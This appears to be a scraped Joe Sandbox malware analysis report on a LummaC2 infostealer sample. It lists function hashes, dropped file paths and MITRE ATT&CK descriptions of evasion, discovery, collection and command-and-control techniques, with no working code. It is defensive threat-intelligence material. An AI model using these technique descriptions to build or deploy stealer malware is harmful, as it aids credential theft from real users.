Instruction ID: d33267cde1c9c86c0766e2c409ea5177b826e5cd27ee873880a791608f354731
Opcode Fuzzy Hash: 6b6e3cb5ff36c47afc54525b1b125e58f3650d2c56974b4a348de80dd10273c0
Instruction Fuzzy Hash: A321CF3160D750CBC7AA8B28D4997FBB393FBC9714F69552DC48B43620CB319842CBA1

Function 006D8640 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3365095319.00000000006B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 006B0000, based on PE: true

Associated: 00000002.00000002.3365079561.00000000006B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365123272.00000000006F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365138917.00000000006F3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365179648.00000000006F7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365226451.0000000000701000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6b0000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e272e9aef16826896c48e3beac77f7bac1df3cdf67f575074c480d6dcc61acb6
Instruction ID: 7a304cf5df3281c2449525af5619ec5ad90d28928cc3aa918781551e8f08aee2
Opcode Fuzzy Hash: e272e9aef16826896c48e3beac77f7bac1df3cdf67f575074c480d6dcc61acb6
Instruction Fuzzy Hash: A801C0399092509FDB088F10D45547BB7F3EB89724F15A86CE58263352CB38EC06CBC6

Function 006D9DA0 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3365095319.00000000006B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 006B0000, based on PE: true

Associated: 00000002.00000002.3365079561.00000000006B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365123272.00000000006F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365138917.00000000006F3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365179648.00000000006F7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365226451.0000000000701000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6b0000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e7b69c494abd83f6118a72f7de64ff912b6fa8dc0b82fccbac9464bcbb27eac
Instruction ID: 10b4f99dea104d8328058ed69051245aa58d2e95b6dec53bb48126a7777d129e
Opcode Fuzzy Hash: 2e7b69c494abd83f6118a72f7de64ff912b6fa8dc0b82fccbac9464bcbb27eac
Instruction Fuzzy Hash: 88019AF1A0170147DB20AE10D4C0BBBA2ABAF91704F08002DE8089B302EB72EC14C7A9

Function 006C46C0 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3365095319.00000000006B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 006B0000, based on PE: true

Associated: 00000002.00000002.3365079561.00000000006B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365123272.00000000006F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365138917.00000000006F3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365179648.00000000006F7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365226451.0000000000701000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6b0000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7a984843b570b7378253929d1441754c9cdf9516a4ccd76f455c2bd59a9e2d53
Instruction ID: 4be45905a721f25036247df87d17a0a0a0f5b9156a0df8dc8f5159fbe2431852
Opcode Fuzzy Hash: 7a984843b570b7378253929d1441754c9cdf9516a4ccd76f455c2bd59a9e2d53
Instruction Fuzzy Hash: 8F01A27BA013128B8324CE9CC4E0ABBB3B1FF96795B2A545DD5815B370DB319D158260

Function 006D10F3 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3365095319.00000000006B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 006B0000, based on PE: true

Associated: 00000002.00000002.3365079561.00000000006B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365123272.00000000006F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365138917.00000000006F3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365179648.00000000006F7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365226451.0000000000701000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6b0000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48203489f0b5a8b32013b4383561885e46f3ed73500dd0cde554ea055fbd76d9
Instruction ID: 29e9bcbf8fe2464cc6b63c78a1c0de1bfcd8b4668b2d58f8610d5bc1555c506e
Opcode Fuzzy Hash: 48203489f0b5a8b32013b4383561885e46f3ed73500dd0cde554ea055fbd76d9
Instruction Fuzzy Hash: 52B092E5C0B4108699512B103D024FBB02E0A53204F083034E80626207BE16E29AC29F

Function 006D34B7 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 246COMMON

Download Yara Rule

APIs

GetLogicalDrives.KERNEL32 ref: 006D3606

Strings

xs, xrefs: 006D34FC
pz, xrefs: 006D36BA
pz, xrefs: 006D376E, 006D34A8
uw, xrefs: 006D3503

Memory Dump Source

Source File: 00000002.00000002.3365095319.00000000006B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 006B0000, based on PE: true

Associated: 00000002.00000002.3365079561.00000000006B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365123272.00000000006F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365138917.00000000006F3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365179648.00000000006F7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365226451.0000000000701000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6b0000_LummaC2.jbxd

Similarity

API ID: DrivesLogical
String ID: pz$pz$uw$xs
API String ID: 999431828-3977666006
Opcode ID: 7c95c3fb44c474c22b59a0de81ece4c6fce3014a1e154b9e5320834dede3adcf
Instruction ID: 7d57cb661e3a08e42f6437435b006094ae15880f83cf65e8cdc0030a43b987d1
Opcode Fuzzy Hash: 7c95c3fb44c474c22b59a0de81ece4c6fce3014a1e154b9e5320834dede3adcf
Instruction Fuzzy Hash: 3C8112F5901216CFC714CF64D8916AABB71FF5A304B4991A8D545AF322E334D981CFC1

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 8wiUGtm9UM.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\8wiUGtm9UM.exe.log

C:\Users\user\AppData\Local\Temp\LummaC2.exe

C:\Users\user\AppData\Local\Temp\Set-up.exe

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Windows Analysis Report
8wiUGtm9UM.exe

Function 006E5135 Relevance: 65.4, Strings: 52, Instructions: 388
COMMON

Function 006B8720 Relevance: 7.7, APIs: 5, Instructions: 235
threadCOMMON

Function 006EBAD0 Relevance: 1.5, APIs: 1, Instructions: 14
libraryCOMMON

Function 006EC59C Relevance: 1.3, Strings: 1, Instructions: 70
COMMON

Function 006EEEC0 Relevance: .1, Instructions: 141
COMMON

Function 006EBC91 Relevance: 1.5, APIs: 1, Instructions: 20
COMMON

Function 006EA080 Relevance: 1.5, APIs: 1, Instructions: 9
memoryCOMMON

Function 006E483C Relevance: 34.0, Strings: 27, Instructions: 298
COMMON

Function 006E1D10 Relevance: 28.2, APIs: 2, Strings: 14, Instructions: 163
COMMON

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre